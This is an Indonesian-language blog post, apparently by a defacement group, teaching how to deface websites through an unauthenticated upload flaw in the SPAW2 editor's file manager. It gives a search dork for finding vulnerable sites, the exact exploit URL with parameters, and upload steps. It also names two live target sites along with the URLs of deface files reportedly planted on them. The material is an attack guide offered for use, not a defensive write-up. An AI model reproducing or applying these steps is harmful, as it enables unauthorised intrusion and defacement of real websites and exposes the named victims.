Deface Spaw Upload Vulnerability + Live Target
Bahan-bahan :
1. HP/PC
2. Kuota (wajib)
3. Jembud (wajib)
4. Dork :
** inurl:"spaw2/upload/files/"
5. Script deface.
** ext : .txt / .html
6. Exploit :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Langkah-langkah :
1. Dorking lah njink kek biasa.
2. Jika udah nemu masukkan exploit nya, seperti dibawah.
www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
atau
www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
3. Cari tulisan image, pencet, rubah jadi file.
4. Pilih file, upload.
5. Cari filenya, cari tulisan "download file"
6. Pencet tuh, auto ke tab baru..
Udah deh, kelar..
Live Target
1. http://www.leanimages.net/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
2. https://www.fem.gr/input/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Hasil?
1. https://www.fem.gr/input/spaw2/uploads/files/duar.txt
2. http://www.leanimages.net/admin/spaw2/uploads/files/vvibu.html
Thnks to
#LightCyberIndo
#MiSetya
Komentar
Posting Komentar